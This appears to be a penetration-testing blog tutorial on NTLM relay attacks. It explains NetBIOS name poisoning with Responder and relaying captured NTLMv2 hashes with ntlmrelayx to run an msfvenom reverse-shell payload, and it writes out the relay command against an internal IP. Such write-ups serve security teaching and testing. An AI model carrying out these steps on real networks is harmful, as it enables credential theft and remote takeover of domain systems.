NTLM Relay Attack

5 min readApr 12, 2020

Net-BIOS (Network Basic Input / Output System) is the system that allows different clients on the local network to communicate with each other.

It is an “API” developed by Systek in 1983 to improve communication on “LAN” for IBM. When an operating system is installed on a system, this computer is assigned the name NetBIOS. Microsoft has classified this name, which consists of 16 ASCII characters, with 15 characters.

NetBIOS provides ease of administration in domains where the client system has a lot. Although a client included in the domain is defined as “accounts.empire.local” to the system, the NetBIOS name for this system is set to “accounts”.

Windows uses the WINS server to match NetBIOS names as IP addresses for systems to communicate with each other through this API. When attempting to reach a system with the name NetBIOS, the cache is checked first, or if WINS is asked to the server and no response is received, broadcast is done.

As you can see in the screenshot, it is quite easy for companies to go to the related system by typing the NetBIOS name and bring the dangers.

You want to reach the system you want to access by typing the NetBIOS name as given in the screenshot above, but I will try to explain what might happen if you enter only one letter incorrectly.

NTLM Relay Attack

With the application with an open source code called “Responder”, LLMNR, NetBIOS NS and MDNS poisoning can be performed in the local network. Using the NTLMv1 / NTLMv2 / LMv2 and simple HTTP authentication mechanisms, which are user authentication mechanisms that respond to requests by responding to the requests of HTTP / SMB / MSSQL / FTP / LDAP services performed incorrectly by the user, responding to the requests and initiating the communication as if it were true. is able to capture their summaries.

As seen in the screenshot, when the user who wants to access the “accounts” system accidentally wrote “accountssss”, NetBIOS NS poisoning was performed with the “responder” tool, and the attacker system logged in to the real “accounts” system by receiving the password of the user’s NTLMv2 has achieved. By obtaining TOKEN information belonging to the user who belongs to the “Domain Admins” group who did not terminate the session on the relevant system in a healthy way, a session on the domain controller was obtained.

The following studies have been carried out for the relevant attack vector.

Payload was created in the attack that will be performed when the connection is made on the target system with the NTLM password digest captured in the network.

“Msfvenom” tool was used for the study. Payload used for “Reverse Connection” in this study is given in the screenshot below.

For the NetBIOS poisoning, “responder” tool was preferred in order to respond to every wrong request in the network. Since the tool “ntlmrelayx.py” will respond to requests as “SMB” and “HTTP Server” while running the related tool, “SMB” and “HTTP Server” options should be set to “OFF” from the “responder.conf” file.

We will run the “ntlmrelayx.py” tool with the command below.

ntlmrelayx.py -t 172.16.1.101 -e shell.exe

The operation of the tool executed with the relevant command is given in the screenshot below.

When the connection is established, a “listener” is set for the payload to be run on the target system.

The user “summer.leonard” has sent an erroneous request to access a different system on the network.

NTLMv2 hash of the user who made the wrong request by the “ntlmrelayx.py” tool has been tried by the attacker system on the system “172.16.1.101” and a share with the right to write on the related system has been found.

The relevant tool loaded the malware with a random name on the target system and ran the relevant pest on the system with service rights.

The “meterpreter” session was obtained by running the malware in the target system.

The malware, which enables the session to be obtained on the system, will be terminated by the operating system thanks to its protection mechanism, as it operates as a service. For this reason, it is necessary to migrate to a different service / process.